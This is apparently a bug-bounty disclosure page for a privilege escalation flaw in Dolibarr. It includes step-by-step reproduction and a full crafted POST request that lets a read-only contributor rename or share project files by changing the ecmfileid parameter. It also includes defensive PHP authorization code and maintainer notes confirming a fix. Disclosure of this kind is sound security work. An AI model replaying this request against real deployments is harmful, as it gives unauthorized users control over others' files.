Improper Privilege Management in dolibarr/dolibarr

Valid

Reported on

May 19th 2021


💥 BUG

An unprivileged user can edit/share a linked file of a project.

💥 VIDEO

https://drive.google.com/file/d/1YaiG0vjFTuqZRck7dMLqkhT7HSZqaEdu/view?usp=sharing

💥 STEP TO REPRODUCE

1. From the admin account, add user B as a normal user.
Now give user B the below permission for the project module.
----> Read projects and tasks (shared project and projects I'm contact for). Can also enter time consumed, for me or my hierarchy, on assigned tasks (Timesheet)
2. Now, from the admin account, go to https://localhost/dolibarr/htdocs/projet/index.php?mainmenu=project&leftmenu= and create a project.
Now add user B to this project as a contributor.
Also upload a file there.

3. Finally, go to user B's account and visit the above project. Here user B can't edit the above uploaded document.


Now user B sends the below request in Burp Suite to edit/share the document.

POST /dolibarr/htdocs/projet/document.php?&id=1&file=PJ2105-0001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 275
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr/htdocs/projet/document.php?action=editfile&urlfile=PJ2105-0001%2FPJ2105-0001-simple.html.noexe&id=1&file=PJ2105-0001&page_y=504
Cookie: DOLSESSID_0553a67aec6c8cfb8172aadb09812143=4ueq8h2hcsro2cicatu2umspk9
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$eIz0ktTX4BELW6Fo.nN3NeeCTrlUUouAR.pwUqzkRAdBKaN.u3DVy&action=renamefile&id=1&modulepart=project&section_dir=PJ2105-0001%2F&renamefilefrom=PJ2105-0001-simple.html.noexe&renamefileto=PJ2105-0001-sssimplse.html.noexe&shareenabled=on&ecmfileid=22&renamefilesave=Save

Here, in this POST data, you change the ecmfileid parameter value to your file id.

💥 Impact

Privilege escalation bug.
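
One way to enforce the missing server-side checks for the `renamefile` request in this report, as an added PHP example that is not part of the report or of Dolibarr's code: the handler checks write permission for the action itself and checks that `ecmfileid` belongs to the project in the request. The function name, the rights strings and the sample records are hypothetical or constructed; the actual fix is not shown on this page.

```php
<?php
// Added example. All names are hypothetical; this is not Dolibarr's API.
// Constructed sample data: per-user rights and stored file records.
$rights = [
    'admin' => ['project.read', 'project.write'],
    'userB' => ['project.read'], // contributor with read-only permission
];
$ecmFiles = [
    22 => ['project_id' => 1, 'name' => 'PJ2105-0001-simple.html.noexe'],
    31 => ['project_id' => 2, 'name' => 'constructed-other-file.txt'],
];
/** Returns [bool $allowed, string $reason] for a renamefile/share request. */
function authorizeFileEdit(array $rights, array $ecmFiles, string $user, array $post): array
{
    // 1. Action-level check, enforced on every state-changing request and
    //    not only when deciding whether to render the edit button.
    if (!in_array('project.write', $rights[$user] ?? [], true)) {
        return [false, 'no write permission on projects'];
    }
    // 2. Identifiers must be integers (missing values fail validation too).
    $projectId = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT);
    $fileId = filter_var($post['ecmfileid'] ?? null, FILTER_VALIDATE_INT);
    if ($projectId === false || $fileId === false) {
        return [false, 'malformed id or ecmfileid'];
    }
    // 3. Object-level check: the record named by ecmfileid must belong to
    //    the project in the request and match the file being renamed.
    $file = $ecmFiles[$fileId] ?? null;
    if ($file === null || $file['project_id'] !== $projectId
        || $file['name'] !== ($post['renamefilefrom'] ?? '')) {
        return [false, 'ecmfileid does not match this project file'];
    }
    // 4. The new name must be a bare file name, with no directory parts.
    $to = $post['renamefileto'] ?? '';
    if ($to === '' || basename($to) !== $to) {
        return [false, 'invalid target file name'];
    }
    return [true, 'ok'];
}

// Request body fields as they appear in the report above.
$post = ['action' => 'renamefile', 'id' => '1', 'ecmfileid' => '22',
    'renamefilefrom' => 'PJ2105-0001-simple.html.noexe',
    'renamefileto' => 'PJ2105-0001-sssimplse.html.noexe', 'shareenabled' => 'on'];
foreach ([['userB', $post], ['admin', $post], ['admin', ['ecmfileid' => '31'] + $post]] as [$user, $req]) {
    [$ok, $why] = authorizeFileEdit($rights, $ecmFiles, $user, $req);
    printf("%-5s ecmfileid=%s -> %s (%s)\n", $user, $req['ecmfileid'], $ok ? 'ALLOW' : 'DENY', $why);
}
```

The read-only contributor is denied at step 1, and a request whose `ecmfileid` points at another project's record is denied at step 3 even for a user with write permission.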

Laurent
6 months ago

Maintainer


Some fixes were done on issues related to similar troubles. I am not sure this is fixed. Will need to recheck once v14 has been released or on the develop branch after the 22nd of May 2021.

Laurent Destailleur validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on ad2e56 a month ago
Laurent Destailleur has been awarded the fix bounty